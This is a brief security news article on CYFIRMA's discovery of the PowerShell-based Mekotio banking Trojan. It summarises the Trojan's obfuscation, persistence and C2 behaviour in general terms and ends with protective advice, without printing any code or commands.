PowerShell-Powered Mekotio Trojan Wreaks Havoc Worldwide

CYFIRMA has discovered a new malicious program called the Mekotio Trojan, which is actively spreading among users worldwide. This sophisticated Trojan employs PowerShell technology to infiltrate computers and steal confidential information.

According to the research, the Mekotio Trojan utilizes a specially encrypted PowerShell script to conceal its malicious activities. Initially, it gathers data about the infected system (including the country, computer name, username, Windows version, and the presence of antivirus software). It then establishes a persistent connection with a remote command-and-control (C2) server and retrieves additional malicious files.

The downloaded files are unpacked and installed in the user’s APPDATA folder, after which they are automatically executed upon each system startup. These files include both executable (.exe) and script (.ahk) components used for further attacks.

Experts report that the IP address of the command-and-control server to which Mekotio connects is registered in the United States with the hosting provider GoDaddy. Moreover, comments found in the Trojan’s code are in Portuguese, suggesting possible involvement by Brazilian or Portuguese cybercriminals.

“Mekotio Trojan is yet another example of how attackers are leveraging advanced technologies to steal data,” said the head of CYFIRMA’s research department. “The use of powerful obfuscation methods and the ensuring of persistent execution make it extremely difficult to detect and remove. All users must enhance their digital hygiene practices and implement robust solutions to protect against such threats.”

CYFIRMA experts note that Mekotio employs multiple layers of encryption and obfuscation to complicate detection. In addition to custom XOR decryption, the attackers also use various obfuscation techniques, such as function and variable name shuffling. This renders the analysis of the malicious code exceedingly laborious and challenging.

The research indicates that Mekotio also attempts to identify which antivirus software is installed on the infected system. It is likely that this information is used to evade detection.

Despite Mekotio’s complexity, CYFIRMA specialists have already developed a YARA rule that allows the Trojan to be identified by its unique characteristics. This will help antivirus solutions detect and block malicious activities.

CYFIRMA recommends using modern antivirus software, regularly updating systems, exercising caution when opening suspicious files, and creating backups of important data. Only a comprehensive approach to cybersecurity can protect against emerging threats like Mekotio.